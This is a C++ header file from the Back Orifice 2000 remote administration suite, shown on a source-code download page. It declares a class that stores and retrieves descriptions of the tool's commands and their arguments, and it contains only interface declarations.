BOCmdDescList.h
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:2k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This program is free software; you can redistribute it and/or modify
  4.     it under the terms of the GNU General Public License as published by
  5.     the Free Software Foundation; either version 2 of the License, or
  6.     (at your option) any later version.
  7.     This program is distributed in the hope that it will be useful,
  8.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  9.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  10.     GNU General Public License for more details.
  11.     You should have received a copy of the GNU General Public License
  12.     along with this program; if not, write to the Free Software
  13.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  14. The author of this program may be contacted at dildog@l0pht.com. */
  15. // BOCmdDescList.h: interface for the CBOCmdDescList class.
  16. //
  17. //////////////////////////////////////////////////////////////////////
  18. #if !defined(AFX_BOCMDDESCLIST_H__AA5D7642_AB9E_11D2_ADC4_0000F8084273__INCLUDED_)
  19. #define AFX_BOCMDDESCLIST_H__AA5D7642_AB9E_11D2_ADC4_0000F8084273__INCLUDED_
  20. #if _MSC_VER > 1000
  21. #pragma once
  22. #endif // _MSC_VER > 1000
  23. #define MAX_BO_COMMANDS 1024
  24. class CBOCmdDescList  
  25. {
  26. private:
  27. typedef struct {
  28. BOOL bNative;
  29. char svFolderName[32];
  30. char svCommName[32];
  31. char svArgDesc1[32];
  32. char svArgDesc2[32];
  33. char svArgDesc3[32];
  34. } BO_COMMAND_DESC; 
  35. BO_COMMAND_DESC m_descList[MAX_BO_COMMANDS];
  36. public:
  37. CBOCmdDescList();
  38. virtual ~CBOCmdDescList();
  39. void SetNativeCommands(void);
  40. void SetDesc(int nCommand);
  41. void SetDesc(int nCommand, char *szFolderName, char *szCommName, char *szArgDesc1, char *szArgDesc2, char *szArgDesc3, BOOL bNative=FALSE);
  42. int  GetCommand(char *szFolderName, char *szCommName);
  43. void FillTreeCtrl(CTreeCtrl *pTree);
  44. char *GetFolderName(int nCommand);
  45. char *GetCommName(int nCommand);
  46. char *GetArgDesc1(int nCommand);
  47. char *GetArgDesc2(int nCommand);
  48. char *GetArgDesc3(int nCommand);
  49. };
  50. #endif // !defined(AFX_BOCMDDESCLIST_H__AA5D7642_AB9E_11D2_ADC4_0000F8084273__INCLUDED_)